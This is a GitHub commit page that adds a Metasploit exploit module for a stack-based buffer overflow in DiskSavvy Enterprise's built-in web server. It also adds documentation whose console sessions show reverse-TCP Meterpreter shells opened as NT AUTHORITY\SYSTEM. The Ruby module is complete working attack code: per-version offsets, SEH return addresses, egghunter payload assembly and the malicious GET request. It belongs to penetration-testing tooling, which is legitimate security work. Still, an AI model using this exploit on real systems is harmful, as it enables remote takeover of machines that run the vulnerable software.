Skip to content

Commit 12a4a62

Browse files
h00dieh00die
committed
Land rapid7#7848, a Disk Savvy Enterprise bof
2 parents 67ec66c + bda464f commit 12a4a62

File tree

2 files changed

+250
-0
lines changed

2 files changed

+250
-0
lines changed

documentation/modules/exploit/windows/http/disksavvy_get_bof.md

Lines changed: 100 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,100 @@
1+
## Vulnerable Application
2+
3+
[DiskSavvy Enterprise](http://www.disksavvy.com) versions up to v9.3.14 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/20058a6ebf1120bca9ac92b493cac1ff-disksavvyent_setup_v9.1.14.exe).
4+
5+
## Verification Steps
6+
1. Install a vulnerable DiskSavvy Enterprise
7+
2. Start `Disk Savvy Enterprise` service
8+
3. Start `Disk Savvy Enterprise` client application
9+
4. Navigate to `Tools` > `Advanced Options` > `Server`
10+
5. Check `Enable Web Server On Port 80` to start the web interface
11+
6. Start `msfconsole`
12+
7. Do `use exploit/windows/http/disksavvy_get_bof`
13+
8. Do `set rhost ip`
14+
9. Do `check`
15+
10. Verify the target is vulnerable
16+
11. Do `set payload windows/meterpreter/reverse_tcp`
17+
12. Do `set lhost ip`
18+
13. Do `exploit`
19+
14. Verify the Meterpreter session is opened
20+
21+
## Scenarios
22+
23+
###DiskSavvy Enterprise v9.1.14 on Windows XP SP3
24+
25+
```
26+
msf exploit(disksavvy_get_bof) > options
27+
28+
Module options (exploit/windows/http/disksavvy_get_bof):
29+
30+
Name Current Setting Required Description
31+
---- --------------- -------- -----------
32+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
33+
RHOST 192.168.198.130 yes The target address
34+
RPORT 80 yes The target port
35+
SSL false no Negotiate SSL/TLS for outgoing connections
36+
VHOST no HTTP server virtual host
37+
38+
39+
Payload options (windows/meterpreter/reverse_tcp):
40+
41+
Name Current Setting Required Description
42+
---- --------------- -------- -----------
43+
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
44+
LHOST 192.168.198.138 yes The listen address
45+
LPORT 4444 yes The listen port
46+
47+
48+
Exploit target:
49+
50+
Id Name
51+
-- ----
52+
0 Automatic Targeting
53+
54+
55+
msf exploit(disksavvy_get_bof) > exploit
56+
57+
[*] Started reverse TCP handler on 192.168.198.138:4444
58+
[*] Automatically detecting the target...
59+
[*] Selected Target: DiskSavvy Enterprise v9.1.14
60+
[*] Sending stage (957999 bytes) to 192.168.198.130
61+
[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:1140) at 2017-01-19 13:38:18 -0500
62+
63+
meterpreter > getuid
64+
Server username: NT AUTHORITY\SYSTEM
65+
meterpreter > sysinfo
66+
Computer : GABOR-03722ADE8
67+
OS : Windows XP (Build 2600, Service Pack 3).
68+
Architecture : x86
69+
System Language : en_US
70+
Domain : WORKGROUP
71+
Logged On Users : 2
72+
Meterpreter : x86/win32
73+
meterpreter >
74+
```
75+
76+
###DiskSavvy Enterprise v9.3.14 on Windows 7 SP1
77+
78+
```
79+
msf exploit(disksavvy_get_bof) > set rhost 192.168.198.133
80+
rhost => 192.168.198.130
81+
msf exploit(disksavvy_get_bof) > exploit
82+
83+
[*] Started reverse TCP handler on 192.168.198.138:4444
84+
[*] Automatically detecting the target...
85+
[*] Selected Target: DiskSavvy Enterprise v9.3.14
86+
[*] Sending stage (957999 bytes) to 192.168.198.133
87+
[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.133:49187) at 2017-01-08 05:16:13 -0500
88+
89+
meterpreter > getuid
90+
Server username: NT AUTHORITY\SYSTEM
91+
meterpreter > sysinfo
92+
Computer : WIN-BCJL9PJ5BF5
93+
OS : Windows 7 (Build 7601, Service Pack 1).
94+
Architecture : x86
95+
System Language : en_US
96+
Domain : WORKGROUP
97+
Logged On Users : 2
98+
Meterpreter : x86/win32
99+
meterpreter >
100+
```

modules/exploits/windows/http/disksavvy_get_bof.rb

Lines changed: 150 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,150 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
8+
class MetasploitModule < Msf::Exploit::Remote
9+
Rank = ExcellentRanking
10+
11+
include Msf::Exploit::Remote::Seh
12+
include Msf::Exploit::Remote::Egghunter
13+
include Msf::Exploit::Remote::HttpClient
14+
15+
def initialize(info = {})
16+
super(update_info(info,
17+
'Name' => 'DiskSavvy Enterprise GET Buffer Overflow',
18+
'Description' => %q{
19+
This module exploits a stack-based buffer overflow vulnerability
20+
in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,
21+
caused by improper bounds checking of the request path in HTTP GET
22+
requests sent to the built-in web server. This module has been
23+
tested successfully on Windows XP SP3 and Windows 7 SP1.
24+
},
25+
'License' => MSF_LICENSE,
26+
'Author' =>
27+
[
28+
'vportal', # Vulnerability discovery and PoC
29+
'Gabor Seljan' # Metasploit module
30+
],
31+
'References' =>
32+
[
33+
['EDB', '40869']
34+
],
35+
'DefaultOptions' =>
36+
{
37+
'EXITFUNC' => 'thread'
38+
},
39+
'Platform' => 'win',
40+
'Payload' =>
41+
{
42+
'BadChars' => "\x00\x09\x0a\x0d\x20",
43+
'Space' => 500
44+
},
45+
'Targets' =>
46+
[
47+
[
48+
'Automatic Targeting',
49+
{
50+
'auto' => true
51+
}
52+
],
53+
[
54+
'DiskSavvy Enterprise v9.1.14',
55+
{
56+
'Offset' => 542,
57+
'Ret' => 0x101142c0 # POP # POP # RET [libspp.dll]
58+
}
59+
],
60+
[
61+
'DiskSavvy Enterprise v9.3.14',
62+
{
63+
'Offset' => 2478,
64+
'Ret' => 0x101142ff # POP # POP # RET [libspp.dll]
65+
}
66+
]
67+
],
68+
'Privileged' => true,
69+
'DisclosureDate' => 'Dec 01 2016',
70+
'DefaultTarget' => 0))
71+
end
72+
73+
def check
74+
res = send_request_cgi(
75+
'method' => 'GET',
76+
'uri' => '/'
77+
)
78+
79+
if res && res.code == 200
80+
version = res.body[/Disk Savvy Enterprise v[^<]*/]
81+
if version
82+
vprint_status("Version detected: #{version}")
83+
if version =~ /9\.(1|3)\.14/
84+
return Exploit::CheckCode::Appears
85+
end
86+
return Exploit::CheckCode::Detected
87+
end
88+
else
89+
vprint_error('Unable to determine due to a HTTP connection timeout')
90+
return Exploit::CheckCode::Unknown
91+
end
92+
93+
Exploit::CheckCode::Safe
94+
end
95+
96+
def exploit
97+
mytarget = target
98+
99+
if target['auto']
100+
mytarget = nil
101+
102+
print_status('Automatically detecting the target...')
103+
104+
res = send_request_cgi(
105+
'method' => 'GET',
106+
'uri' => '/'
107+
)
108+
109+
if res && res.code == 200
110+
if res.body =~ /Disk Savvy Enterprise v9\.1\.14/
111+
mytarget = targets[1]
112+
elsif res.body =~ /Disk Savvy Enterprise v9\.3\.14/
113+
mytarget = targets[2]
114+
end
115+
end
116+
117+
if !mytarget
118+
fail_with(Failure::NoTarget, 'No matching target')
119+
end
120+
121+
print_status("Selected target: #{mytarget.name}")
122+
end
123+
124+
eggoptions = {
125+
checksum: true,
126+
eggtag: rand_text_alpha(4, payload_badchars)
127+
}
128+
129+
hunter, egg = generate_egghunter(
130+
payload.encoded,
131+
payload_badchars,
132+
eggoptions
133+
)
134+
135+
sploit = make_nops(10)
136+
sploit << egg
137+
sploit << rand_text_alpha(mytarget['Offset'] - egg.length)
138+
sploit << generate_seh_record(mytarget.ret)
139+
sploit << make_nops(8)
140+
sploit << hunter
141+
sploit << rand_text_alpha(4500)
142+
143+
print_status('Sending malicious request...')
144+
145+
send_request_cgi(
146+
'method' => 'GET',
147+
'uri' => sploit
148+
)
149+
end
150+
end

0 commit comments

Comments
 (0)